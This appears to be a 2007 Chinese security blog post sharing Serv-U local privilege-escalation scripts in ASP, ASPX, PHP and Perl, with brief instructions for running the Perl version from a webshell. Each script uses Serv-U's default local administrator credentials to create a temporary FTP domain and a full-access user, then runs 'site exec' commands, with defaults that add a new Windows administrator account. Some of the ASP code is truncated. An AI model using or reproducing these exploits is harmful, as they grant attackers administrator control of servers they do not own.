elva

分享serv-u利用腳本(asp/aspx/php/perl)

ASP

<%
'Serv-U asp 提權(quán)程序
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
    set a=Server.CreateObject("Microsoft.XMLHTTP")
    a.open "GET", "    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
    set session("a")=a
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>正在連接 127.0.0.1:<%=port%>,使用用戶名: <%=user%>,口令：<%=pass%>...<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 2
    set b=Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "    b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>正在提升權(quán)限,請等待...,<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 3
    set c=Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "    c.send loginuser & loginpass & mt & deldomain & quit
    set session("c")=c
%>
<center>提權(quán)完畢,已執(zhí)行了命令：<br><font color=red><%=cmd%></font><br><br>
<input type=button value=" 返回繼續(xù) " onClick="location.href='<%=gname()%>';">
</center>
<%
case else
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>
<center><form method="post" name="goldsun">
<table width="494" height="163" border="1" cellpadding="0" cellspacing="1" bordercolor="#666666">
<tr align="center" valign="middle">
    <td colspan="2">Serv-U 提升權(quán)限 ASP版 Goldsun[at]84823714</td>
</tr>
<tr align="center" valign="middle">
    <td width="100">用戶名:</td>
    <td width="379"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
</tr>
<tr align="center" valign="middle">
    <td>口　令：</td>
    <td><input name="p" type="text" id="p" value=" #l@$ak#.lk;0@P"></td>
</tr>
<tr align="center" valign="middle">
    <td>端　口：</td>
    <td><input name="port" type="text" id="port" value="43958"></td>
</tr>
<tr align="center" valign="middle">
    <td>系統(tǒng)路徑：</td>
    <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
</tr>
<tr align="center" valign="middle">
    <td>命　令：</td>
    <td><input name="c" type="text" id="c" value="cmd /c net user goldsun love /add & net localgroup administrators goldsun /add" size="50"></td>
</tr>

<tr align="center" valign="middle">
    <td colspan="2"><input type="submit" name="Submit" value="提交">　
      <input type="reset" name="Submit2" value="重置">
      <input name="action" type="hidden" id="action" value="1"></td>
</tr>
</table></form></center>
<% end select
function Gpath()
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>

ASPX

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

'
' Love, where are you ?

Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text

Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-deleteDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

'Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub

Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
admin by lake2</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
<asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
</p>
<p>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />

</p>
</form>
</body>
</html>

PHP

<?php
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
  $sendbuf = "";
  $recvbuf = "";
  $domain = "-SETDOMAIN\r\n".
   "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
   "-TZOEnable=0\r\n".
   " TZOKey=\r\n";
  $adduser = "-SETUSERSETUP\r\n".
   "-IP=0.0.0.0\r\n".
   "-PortNo=2121\r\n".
   "-User=Will_Be\r\n".
   "-Password=Will_Be\r\n".
   "-HomeDir=c:\\\r\n".
   "-LoginMesFile=\r\n".
   "-Disable=0\r\n".
   "-RelPaths=1\r\n".
   "-NeedSecure=0\r\n".
   "-HideHidden=0\r\n".
   "-AlwaysAllowLogin=0\r\n".
   "-ChangePassword=0\r\n".
   "-QuotaEnable=0\r\n".
   "-MaxUsersLoginPerIP=-1\r\n".
   "-SpeedLimitUp=0\r\n".
   "-SpeedLimitDown=0\r\n".
   "-MaxNrUsers=-1\r\n".
   "-IdleTimeOut=600\r\n".
   "-SessionTimeOut=-1\r\n".
   "-Expire=0\r\n".
   "-RatioUp=1\r\n".
   "-RatioDown=1\r\n".
   "-RatiosCredit=0\r\n".
   "-QuotaCurrent=0\r\n".
   "-QuotaMaximum=0\r\n".
   "-Maintenance=None\r\n".
   "-PasswordType=Regular\r\n".
   "-Ratios=None\r\n".
   " Access=c:\\|RELP\r\n";
  $deldomain="-DELETEDOMAIN\r\n".
   "-IP=0.0.0.0\r\n".
   " PortNo=2121\r\n";
  $sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER ".$_POST["User"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS ".$_POST["Pass"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "SITE MAINTENANCE\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $domain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $adduser;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Exploit ...<br>";
  echo "**********************************************************<br>";
  $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "site exec ".$_POST["Command"]."\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["Command"]."</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Delete Domain ...<br>";
  echo "**********************************************************<br>";
  $sendbuf = $deldomain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  fclose($sock);
  fclose($exp);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" c>
<title>Serv-U Local Exploit By Will_Be</title>
</head>

<body>
<form method="post">
LocalPort:
<input name="Port" type="text" id="Port" value="43958">
<br>
LocalUser:
<input name="User" type="text" id="User" value="LocalAdministrator">
<br>
LocalPass:
<input name="Pass" type="text" id="Pass" value="#l@$ak#.lk;0@P">
<br>
Command　:
<input name="Command" type="text" id="Command" value="net user Will_Be heihei /add">
<br>
<input type="submit" name="Submit" value="提交">　　
<input type="reset" name="Submit" value="重置">
</form>
</body>
</html>

Perl
Perl的默認安裝路徑是：C:\Perl
然后使用：
perl 你的pl文件的路徑。
在WEBSHELL中的路徑是這樣的：
C:\perl\bin\perl 你的pl文件的路徑

#!/usr/bin/perl
use IO::Socket;

binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$addr = "127.0.0.1";
$ftpport = 21;
$adminport = 43958;
$adminuser = "LocalAdministrator";
$adminpass = '#l@$ak#.lk;0@P';
$user = "h4x0r";
$password = "123456";
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';

use IO::Socket::INET;

$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";

print "TEST<br><br>";

print $sock "USER $adminuser\r\n";
sleep (1);
print $sock "PASS $adminpass\r\n";
sleep(1);
print $sock "SITE MAINTENANCE\r\n";
sleep(1);
print $sock "-SETUSERSETUP\r\n";
print $sock "-IP=".$addr."\r\n";
print $sock "-PortNo=".$ftpport."\r\n";
print $sock "-User=".$user."\r\n";
print $sock "-Password=".$password."\r\n";
print $sock "-HomeDir=".$homedir."\r\n";
print $sock "-LoginMesFile=\r\n";
print $sock "-Disable=0\r\n";
print $sock "-RelPaths=0\r\n";
print $sock "-NeedSecure=0\r\n";
print $sock "-HideHidden=0\r\n";
print $sock "-AlwaysAllowLogin=0\r\n";
print $sock "-ChangePassword=1\r\n";
print $sock "-QuotaEnable=0\r\n";
print $sock "-MaxUsersLoginPerIP=-1\r\n";
print $sock "-SpeedLimitUp=-1\r\n";
print $sock "-SpeedLimitDown=-1\r\n";
print $sock "-MaxNrUsers=-1\r\n";
print $sock "-IdleTimeOut=600\r\n";
print $sock "-SessionTimeOut=-1\r\n";
print $sock "-Expire=0\r\n";
print $sock "-RatioUp=1\r\n";
print $sock "-RatioDown=1\r\n";
print $sock "-RatiosCredit=0\r\n";
print $sock "-QuotaCurrent=0\r\n";
print $sock "-QuotaMaximum=0\r\n";
print $sock "-Maintenance=System\r\n";
print $sock "-PasswordType=Regular\r\n";
print $sock "-Ratios=None\r\n";
print $sock " Access=".$homedir."|RWAMELCDP\r\n";
print $sock "QUIT\r\n";

@ret=<$sock>;
print "@ret";

close(STDERR);
close(STDOUT);
exit;

posted on 2007-08-04 15:17 葉子閱讀(771) 評論(0) 編輯收藏引用所屬分類: 網(wǎng)絡(luò)安全

只有注冊用戶登錄后才能發(fā)表評論。


相關(guān)文章: 最詳細的SQL注入相關(guān)的命令整理 AK922: 突破磁盤低級檢測實現(xiàn)文件隱藏分享serv-u利用腳本(asp/aspx/php/perl) Symantec 核心驅(qū)動 symtdi.sys 本地權(quán)限提升漏洞 Rav 核心驅(qū)動 memscan.sys 本地權(quán)限提升漏洞 Linux Kernel do_mremap VMA本地權(quán)限提升漏洞 Kaspersky Anti-Virus 遠程刪除任意文件漏洞分析及利用代碼命令批處理實現(xiàn)對3389登錄的日志記錄判斷當(dāng)前用戶是否為系統(tǒng)管理員 2000下可執(zhí)行文件修改自身

網(wǎng)站導(dǎo)航: 博客園 IT新聞 BlogJava 博問 Chat2DB 管理

導(dǎo)航

統(tǒng)計信息

隨筆 - 202
文章 - 1
評論 - 115
Trackbacks - 0

News

當(dāng)你對某個領(lǐng)域感興趣時，你會在走路、上課或洗澡時都對它念念不忘，你在該領(lǐng)域內(nèi)就更容易取得成功。更進一步，如果你對該領(lǐng)域有激情，你就可能為它廢寢忘食，連睡覺時想起一個主意，都會跳起來

常用鏈接

留言簿(19)

隨筆分類

隨筆檔案

相冊

1
2
3
other

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品